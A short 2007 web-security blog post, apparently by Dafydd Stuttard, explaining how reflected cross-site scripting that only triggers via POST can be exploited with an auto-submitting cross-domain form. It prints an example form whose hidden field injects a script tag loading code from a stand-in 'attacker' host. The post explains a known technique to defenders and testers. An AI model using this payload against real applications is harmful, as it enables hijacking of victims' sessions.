Exploiting XSS in POST requests

^{Dafydd Stuttard |
29 March 2007 at 18:21 UTC}

One good question I was asked in Amsterdam was whether it is possible to exploit a reflected cross-site scripting bug that can only be triggered via a POST request. The answer, of course, is "yes".

There are plenty of delivery mechanisms for reflected XSS attacks, only some of which involve inducing a victim to click on a crafted URL. For example, an attacker can create an innocuous looking web page containing an HTML form with the required fields, and a script which auto-submits the form:

<form name=TheForm action=http://vuln-app/page.jsp method=post>
<input type=hidden name=foo value=&quot;&gt;&lt;script&#32;src=http://attacker/ bad.js&gt;&lt;/script&gt;>
</form>
<script>
document.TheForm.submit();
</script>

Rather than creating his own web site, the attacker could of course inject the above attack into a third-party application via a stored XSS bug. The form is submitted cross-domain (as in a cross-site request forgery attack), but the resulting payload executes within the security context of the vulnerable application, enabling the full range of standard XSS attack actions to be performed.

XSS

Dafydd Stuttard

@DafyddStuttard

Exploiting XSS in POST requests

Burp Suite Enterprise Edition winter update

API Security: The 6 biggest challenges AppSec teams face, and how to solve them.

Introducing Burp Suite’s game-changing performance update ⚡🏎️

Related stories

Top web hacking techniques

Radio silence from DMS vendor quartet over XSS zero-days

Magic quadrant

XSS Hunter tool is resurrected with new features